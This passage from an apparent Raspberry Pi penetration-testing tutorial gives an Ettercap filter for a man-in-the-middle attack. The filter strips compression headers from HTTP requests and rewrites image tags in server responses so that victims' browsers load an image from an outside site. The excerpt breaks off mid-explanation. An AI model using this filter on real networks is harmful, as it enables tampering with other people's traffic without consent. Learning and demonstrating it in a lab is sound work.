Pushing unexpected images to browser windows
Not only do man-in-the-middle attacks allow us to spy on the traffic as it passes by, we also have the option of modifying the packets before we pass them on to its rightful owner. To manipulate packet contents with Ettercap, we will first need to build some filter code in nano:
pi@raspberrypi ~ $ nano myfilter.ecf
The following is our filter code:
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Mischief");
}
}
if (ip.proto == TCP && tcp.src == 80) {
if (search(DATA.data, "<img")) {
replace("src=", "src=\"http://www.intestinate.com/tux.png\" alt=");
msg("Mischief Managed!\n");
}
}The first block looks for any TCP packets with a destination of port 80, that is, packets that a web browser sends to a web server to request for pages. The filter then peeks inside...
